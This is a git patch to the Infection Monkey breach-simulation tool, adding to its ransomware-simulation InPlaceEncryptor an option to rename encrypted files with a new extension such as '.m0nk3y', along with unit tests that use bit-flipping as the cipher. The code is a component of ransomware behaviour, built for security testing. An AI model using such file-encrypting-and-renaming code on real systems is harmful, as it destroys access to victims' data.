From 39171f0950821657b0729db8e00a582afb78f226 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Wed, 14 Jul 2021 08:34:58 -0400 Subject: [PATCH] Agent: Add ability to rename file to InPlaceEncryptor --- .../ransomware/in_place_encryptor.py | 25 +++++++++++++++++- .../ransomware/test_in_place_encryptor.py | 26 ++++++++++++++++++- 2 files changed, 49 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/ransomware/in_place_encryptor.py b/monkey/infection_monkey/ransomware/in_place_encryptor.py index 275945e96..beb3c1518 100644 --- a/monkey/infection_monkey/ransomware/in_place_encryptor.py +++ b/monkey/infection_monkey/ransomware/in_place_encryptor.py @@ -1,13 +1,32 @@ +import re from pathlib import Path from typing import Callable +FILE_EXTENSION_REGEX = re.compile(r"^\.[^\\/]+$") + class InPlaceEncryptor: - def __init__(self, encrypt_bytes: Callable[[bytes], bytes], chunk_size: int = 64): + def __init__( + self, + encrypt_bytes: Callable[[bytes], bytes], + new_file_extension: str = "", + chunk_size: int = 64, + ): self._encrypt_bytes = encrypt_bytes self._chunk_size = chunk_size + if new_file_extension and not FILE_EXTENSION_REGEX.match(new_file_extension): + raise ValueError(f'"{new_file_extension}" is not a valid file extension.') + + self._new_file_extension = new_file_extension + def __call__(self, filepath: Path): + self._encrypt_file(filepath) + + if self._new_file_extension: + self._add_extension(filepath) + + def _encrypt_file(self, filepath: Path): with open(filepath, "rb+") as f: data = f.read(self._chunk_size) while data: @@ -19,3 +38,7 @@ class InPlaceEncryptor: f.write(encrypted_data) data = f.read(self._chunk_size) + + def _add_extension(self, filepath: Path): + new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}") + filepath.rename(new_filepath) diff --git a/monkey/tests/unit_tests/infection_monkey/ransomware/test_in_place_encryptor.py b/monkey/tests/unit_tests/infection_monkey/ransomware/test_in_place_encryptor.py index f87302f19..ab7f43028 100644 --- a/monkey/tests/unit_tests/infection_monkey/ransomware/test_in_place_encryptor.py +++ b/monkey/tests/unit_tests/infection_monkey/ransomware/test_in_place_encryptor.py @@ -14,10 +14,22 @@ from tests.utils import hash_file from infection_monkey.ransomware.in_place_encryptor import InPlaceEncryptor from infection_monkey.utils.bit_manipulators import flip_bits +EXTENSION = ".m0nk3y" + + +def with_extension(filename): + return f"{filename}{EXTENSION}" + @pytest.fixture(scope="module") def in_place_bitflip_encryptor(): - return InPlaceEncryptor(flip_bits, 64) + return InPlaceEncryptor(encrypt_bytes=flip_bits, chunk_size=64) + + +@pytest.mark.parametrize("invalid_extension", ["no_dot", ".has/slash", ".has\\slash"]) +def test_invalid_file_extension(invalid_extension): + with pytest.raises(ValueError): + InPlaceEncryptor(encrypt_bytes=None, new_file_extension=invalid_extension) @pytest.mark.parametrize( @@ -47,3 +59,15 @@ def test_file_encrypted_in_place(in_place_bitflip_encryptor, ransomware_target): actual_inode = os.stat(test_keyboard).st_ino assert expected_inode == actual_inode + + +def test_encrypted_file_has_new_extension(ransomware_target): + test_keyboard = ransomware_target / TEST_KEYBOARD_TXT + encrypted_test_keyboard = ransomware_target / with_extension(TEST_KEYBOARD_TXT) + encryptor = InPlaceEncryptor(encrypt_bytes=flip_bits, new_file_extension=EXTENSION) + + encryptor(test_keyboard) + + assert not test_keyboard.exists() + assert encrypted_test_keyboard.exists() + assert hash_file(encrypted_test_keyboard) == TEST_KEYBOARD_TXT_ENCRYPTED_SHA256